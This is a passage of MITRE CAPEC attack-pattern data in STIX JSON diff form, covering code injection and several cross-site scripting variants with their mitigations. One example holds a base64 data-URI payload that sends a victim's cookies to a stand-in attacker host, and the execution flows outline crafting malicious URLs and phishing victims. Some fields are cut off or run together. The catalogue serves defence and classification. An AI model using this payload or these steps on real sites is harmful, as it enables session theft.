"url": "https://owasp.org/www-community/attacks/Resource_Injection" + } + ], + "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Resource Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4" + ], + "x_capec_prerequisites": [ + "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all input content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56610af9-7476-40eb-9fe6-53cf9958d96d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "spec_version": "2.1", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49b55648-8b51-4e4f-981c-60f90a683b32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce regular patching of software.", + "id": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6454cc9d-9fac-4495-9887-bfcf65fb0131", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "spec_version": "2.1", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-242 : Code Injection\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-241", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/241.html" + } + ], + "id": "attack-pattern--b8923381-6219-46bf-b05d-3fa706c0d467", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Code Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.", + "external_references": [ + { + "external_id": "CAPEC-242", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/242.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "description": "Code Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Code_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-612", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.html" + } + ], + "id": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Code Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--634aeef0-13a8-449b-afea-332cbc6095bf", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_prerequisites": [ + "The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-242-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f5e3b137-a200-4caa-9f02-88cba0ca4e80", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcbfee88-5388-4fea-b023-06917c8b7cfd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e446d58c-04b2-49cb-a3bd-32a5c4a303b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b074b90c-807f-4764-ae36-cfc636a4d377", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.", + "external_references": [ + { + "external_id": "CAPEC-243", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/243.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Jeremiah Grossman, Attribute-Based Cross-Site Scripting", + "external_id": "REF-94", + "source_name": "reference_from_CAPEC", + "url": "http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html" + } + ], + "id": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Targeting HTML Attributes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS targeting HTML attributes: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various malicious expressions as input, hoping to embed them as HTML attributes.

    2. Techniques
    Inject single and double quotes into URL parameters or other inputs to see if they are filtered out. Also use URL encoding to bypass filters.
    Use single or double quotes to close attribute evaluation and enter a new attribute that contains an expression.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Execute a script using an expression embedded in an HTML attribute, which avoids needing to inject a script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_prerequisites": [ + "The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands." + ], + "x_capec_resources_required": [ + "The adversary must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0809c5e1-86fc-4df6-8e5e-50939743e745", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for all input including that which is not expected to have any scripting content.", + "id": "course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-243-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f1ebe4-ac7e-4221-af0e-4f36e5905da9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--efed9086-1bee-4608-a734-9e9b775b744f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits the ability of most browsers to interpret \"data\", \"javascript\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.", + "external_references": [ + { + "external_id": "CAPEC-244", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/244.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Google Cross-Site Scripting HOWTO article, Google", + "external_id": "REF-96", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/doctype/wikis/ArticleXSSInUrlAttributes.wiki" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting URI Placeholders", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following payload data:\n text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==\n represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.\n The decoded payload is the following piece of HTML code:\n \n \n \n Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.\n An adversary could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):\n My Link\n Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various payloads formatted as data URI schemes using base to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious payload formatted as a URI scheme, or use the URL returned when the URI scheme was given as input to the web application.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application" + ], + "x_capec_skills_required": { + "Medium": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e01b3e67-6f6d-47fe-a52a-568341eaba2c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-244-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1be8912-a434-4763-a021-096909c3c231", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2dd74b7-ad13-4193-b646-3ae46944b3c3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4100acc-da5c-4fd0-a273-8a3d0fe4ea3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d630925-153a-43e4-a045-6c039ccdbdbe", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9508c797-2ba7-4939-a345-8ab83ec69feb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b5c6c90-751d-4b9c-b88f-480109d98c30", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76657fee-14db-472c-9608-b7bce62e9fb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<", + "\n Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an adversary would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.\n Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the adversary, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe public links for XSS vulnerability: The adversary uses the public links gathered in the \"Explore\" phase as a target list and requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.

    2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
